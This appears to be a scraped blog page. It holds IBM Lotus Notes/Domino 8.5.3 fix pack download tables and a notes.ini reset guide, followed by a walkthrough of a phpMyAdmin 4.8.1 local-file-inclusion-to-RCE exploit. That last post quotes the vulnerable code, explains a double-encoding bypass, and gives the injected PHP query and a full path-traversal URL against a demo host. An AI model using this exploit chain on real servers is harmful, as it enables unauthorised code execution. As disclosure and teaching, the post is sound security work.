Solaris	DominoServer_853FP3_Sol	lotus_domino853FP3_solaris.tar
Linux	DominoServer_853FP3_Linux	lotus_domino853FP3_linux_x86.tar
AIX	DominoServer_853FP3_AIX32	lotus_domino853FP3_aix32.tar
AIX64	DominoServer_853FP3_AIX64	lotus_domino853FP3_aix64.tar
zSeries	DominoServer_853FP3_zSeries	lotus_domino853FP3_zlinux64.tar
IBM i 5.4	DominoServer_853FP3_IBMi_5.4	lotus_domino853FP3_systemiv5.exe
IBM i 6.1 & 7.1	DominoServer_853FP3_IBMi_6.1_7.1	lotus_domino853FP3_systemiv6v7.exe

Notes Basic Configuration

Platform	Individual Fix IDs	File name & Download link
W32	Notes_853FP3_Basic_W32	lotus_notes853FP3_basic_win.exe
Mac	Notes_853FP3_Basic_MAC	lotus_notes853FP3_basic_mac.dmg

Notes Standard Configuration

Platform	Individual Fix IDs	File name & Download link
W32	Notes_853FP3_Standard_W32	lotus_notes853FP3_win.exe
Mac	Notes_853FP3_Standard_MAC	lotus_notes853FP3_mac.dmg
Linux (Debian Install)	Notes_853FP3_Standard_DebianInstall_Linux	lotus_notes853FP3_linuxUb.tar
Linux (RPM Install)	Notes_853FP3_Standard_RPMInstall_Linux	lotus_notes853FP3_linux.tar

8.5.3 Fix Pack 2 Incremental Installers

• Notes/Domino 8.5.3 Fix Pack 2 Release Notice & "Top 20" Fix List

Fix Central

Domino

Platform	Individual Fix IDs	File name & Download link
W32	DominoServer_853FP2_W32	lotus_domino853FP2_w32.exe
W64	DominoServer_853FP2_W64	lotus_domino853FP2_w64.exe
Solaris	DominoServer_853FP2_Sol	lotus_domino853FP2_solaris.tar
Linux	DominoServer_853FP2_Linux	lotus_domino853FP2_linux_x86.tar
AIX	DominoServer_853FP2_AIX	lotus_domino853FP2_aix32.tar
AIX64	DominoServer_853FP2_AIX64	lotus_domino853FP2_aix64.tar
zSeries	DominoServer_853FP2_zSeries	lotus_domino853FP2_zlinux64.tar
IBM i 5.4	DominoServer_853FP2_IBMi_5.4	lotus_domino853FP2_systemiv5.exe
IBM i 6.1 & 7.1	DominoServer_853FP2_IBMi_6.1_7.1	lotus_domino853FP2_systemiv6v7.exe

Notes Basic Configuration

Platform	Individual Fix IDs	File name & Download link
W32	Notes_853FP2_Basic_W32	lotus_notes853FP2_basic_win.exe
Mac	Notes_853FP2_Basic_MAC	lotus_notes853FP2_basic_mac.dmg

Notes Standard Configuration

Platform	Individual Fix IDs	File name & Download link
W32	Notes_853FP2_Standard_W32	lotus_notes853FP2_win.exe
Mac	Notes_853FP2_Standard_MAC	lotus_notes853FP2_mac.dmg
Linux (Debian Install)	Notes_853FP2_Standard_DebianInstall_Linux	lotus_notes853FP2_linuxUb.tar
Linux (RPM Install)	Notes_853FP2_Standard_RPMInstall_Linux	lotus_notes853FP2_linux.tar

8.5.3 Fix Pack 1 Incremental Installers

• Notes/Domino 8.5.3 Fix Pack 1 Release Notice & "Top 20" Fix List

Fix Central

Domino

Platform	Individual Fix IDs	File name & Download link
W32	DominoServer_853FP1_W32	lotus_domino853FP1_w32.exe
W64	DominoServer_853FP1_W64	lotus_domino853FP1_w64.exe
Solaris	DominoServer_853FP1_Sol	lotus_domino853FP1_solaris.tar
Linux	DominoServer_853FP1_Linux	lotus_domino853FP1_linux_x86.tar
AIX	DominoServer_853FP1_AIX	lotus_domino853FP1_aix32.tar
AIX64	DominoServer_853FP1_AIX64	lotus_domino853FP1_aix64.tar
zSeries	DominoServer_853FP1_zSeries	lotus_domino853FP1_zlinux64.tar
IBM i 5.4	DominoServer_853FP1_IBMi_5.4	lotus_domino853FP1_systemiv5.exe
IBM i 6.1 & 7.1	DominoServer_853FP1_IBMi_6.1_7.1	lotus_domino853FP1_systemiv6v7.exe

Notes Basic Configuration

Platform	Individual Fix IDs	File name & Download link
W32	Notes_853FP1_Basic_W32	notesbasic_853FP1_windows.exe
Mac	Notes_853FP1_Basic_MAC	notesbasic_853FP1_mac.dmg

Notes Standard Configuration

Platform	Individual Fix IDs	File name & Download link
W32	Notes_853FP1_Standard_W32	notes_853FP1_windows.exe
Mac	Notes_853FP1_Standard_MAC	notes_853FP1_mac.dmg
Linux (Debian Install)	Notes_853FP1_Standard_DebianInstall_Linux	notes_853FP1_linux.tar
Linux (RPM Install)	Notes_853FP1_Standard_RPMInstall_Linux	notes_853FP1_linuxUb.tar

Domino Designer & Domino Administrator

• If running Notes 8.5.3 Basic Configuration or Notes/Admin (Basic edition) 8.5.3, use the Notes 8.5.3 Fix Pack 1 Basic install.

• If running Notes 8.5.3 Standard Configuration or Notes/Admin/Designer (Standard edition) 8.5.3, use the Notes 8.5.3 Fix Pack 1 Standard install.

Passport Advantage

Customers with Passport Advantage Software Maintenance can also download these incremental installers from IBM Passport Advantage Online.

Domino

Platform	Part Number	Description
W32	CI6EDEN	IBM Lotus Domino Server 8.5.3 Fix Pack 1 for Windows
W64	CI6EEEN	IBM Lotus Domino Server 8.5.3 Fix Pack 1 for Windows 64
Solaris	CI6EFEN	IBM Lotus Domino Server 8.5.3 Fix Pack 1 for Solaris Sparc
Linux	CI6EGEN	IBM Lotus Domino Server 8.5.3 Fix Pack 1 for Linux on Intel
AIX	CI6EHEN	IBM Lotus Domino Server 8.5.3 Fix Pack 1 for AIX
AIX64	CI6EIEN	IBM Lotus Domino Server 8.5.3 Fix Pack 1 for AIX64
zSeries	CI6EAEN	IBM Domino Server 8.5.3 Fix Pack 1 Linux on zSeries
IBM i 5.4	CI6EBEN	IBM Lotus Domino Server 8.5.3 Fix Pack 1 for IBM i5.4
IBM i 6.1 & 7.1	CI6ECEN	IBM Lotus Domino Server 8.5.3 Fix Pack 1 for IBM i6.1&7.1

Notes Basic Configuration

Platform	Part Number	Description
Mac	CI6E5EN	Notes Basic 8.5.3 Fix Pack 1 Mac English
Windows	CI6E4EN	Notes Basic 8.5.3 Fix Pack 1 Windows English

Notes Standard Configuration

Platform	Part Number	Description
Windows	CI6E7EN	Notes STD 8.5.3 Fix Pack 1 Windows English
Mac	CI6E6EN	Notes STD 8.5.3 Fix Pack 1 Mac English
Linux (Debian Install)	CI6E9EN	Notes STD 853 Fix Pack 1 Linux(Debian Install) English
Linux (RPM Install)	CI6E8EN	Notes STD 853 Fix Pack 1 Linux(RPM Install) English

 

Cross reference information

Segment	Product	Component	Platform	Version	Edition
Messaging Applications	IBM Domino			8.5.3.5, 8.5.3.4, 8.5.3.3, 8.5.3.2, 8.5.3.1, 8.5.3
Messaging Applications	IBM iNotes			8.5.3.5, 8.5.3.4, 8.5.3.3, 8.5.3.2, 8.5.3.1, 8.5.3

Read more »

Posted in: domino,Domino Serv,fix,lotus,Lotus Notes

How to reinitialize your Lotus Notes client (same user)

In some situations, some issues with Lotus Notes can be fixed by re-running the initial setup. This is the same setup that had to be done right after Lotus Notes was installed.
These instructions should not be used to re-configure Lotus Notes when a computer with Lotus Notes installed for one user is being transferred to another user.
NOTE: This solution requires advanced knowledge and experience in troubleshooting of Lotus Notes, and should be performed by or under the supervision of the qualified IT staff only.
Follow these steps:
1. Shut down Lotus Notes.
2. Find notes.ini file and make a backup copy of it.
3. Edit notes.ini using Notepad and delete all contents of it except that first 6 lines. The last line should be an empty line (see red arrow in the capture below). Edited notes.ini should look like this:

 

Note that depending of the type and location of the installation, some parameters (ie. text after the "=" sign in each line) in your notes.ini my be different form these pictured above. However, in each case these same labels should appear at the beginning of each line: [Notes], KitType, Directory, InstallType, InstallMode, and NotesProgram.
4. Save your changes and close notes.ini
5. Restart Lotus Notes
You will be prompted to go though the initial setup.

Read more »

Posted in: Lotus Notes

phpMyAdmin 4.8.x LFI to RCE (Authorization Required)

Author: @Ambulong

Security Team ChaMd5 disclose a Local File Inclusion vulnerability in phpMyAdmin latest version 4.8.1. And the exploiting of this vulnerability may lead to Remote Code Execution.
In this article, we will use VulnSpy’s online phpMyAdmin environment to demonstrate the exploit of this vulnerability.
VulnSpy’s online phpMyAdmin environment address: http://www.vulnspy.com/phpmyadmin-4.8.1/

Vulnerability Details

1.Line 54-63 in file /index.php:

1 // If we have a valid target, let's load that script instead 2 if (! empty($_REQUEST['target']) 3 && is_string($_REQUEST['target']) 4 && ! preg_match('/^index/', $_REQUEST['target']) 5 && ! in_array($_REQUEST['target'], $target_blacklist) 6 && Core::checkPageValidity($_REQUEST['target']) 7 ) { 8 include $_REQUEST['target']; 9 exit; 10 }

2.Core::checkPageValidity in /libraries/classes/Core.php

1 /**

2 * boolean phpMyAdmin.Core::checkPageValidity(string &$page, array $whitelist)

3 *

4 * checks given $page against given $whitelist and returns true if valid

5 * it optionally ignores query parameters in $page (script.php?ignored)

6 *

7 * @param string &$page     page to check

8 * @param array  $whitelist whitelist to check page against

9 *

10 * @return boolean whether $page is valid or not (in $whitelist or not)

11 */

12 public static function checkPageValidity(&$page, array $whitelist = [])

13 {

14    if (empty($whitelist)) {

15        $whitelist = self::$goto_whitelist;

16    }

17    if (! isset($page) || !is_string($page)) {

18        return false;

19    }

20    if (in_array($page, $whitelist)) {

21        return true;

22    }

23    $_page = mb_substr(

24        $page,

25        0,

26        mb_strpos($page . '?', '?')

27    );

28    if (in_array($_page, $whitelist)) {

29        return true;

30    }

31    $_page = urldecode($page);

32    $_page = mb_substr(

33        $_page,

34        0,

35        mb_strpos($_page . '?', '?')

36    );

37    if (in_array($_page, $whitelist)) {

38        return true;

39    }

40    return false;

41 }

Core::checkPageValidity can be bypassed by using by double encoding like %253f.

Exploit

An attacker can use this vulnerability to include session file to lauching a Remote Code Execution vulnerability.
1.Use username root, password toor log into phpmyadmin.
Login PMA 2.Run SQL query

1	select '<?php phpinfo();exit;?>'

Login PMA 3.Get your Session ID
Session ID is the item phpMyAdmin in your cookie.
Login PMA 4.Include the session file

1	http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

Read more »

Posted in: Exploit#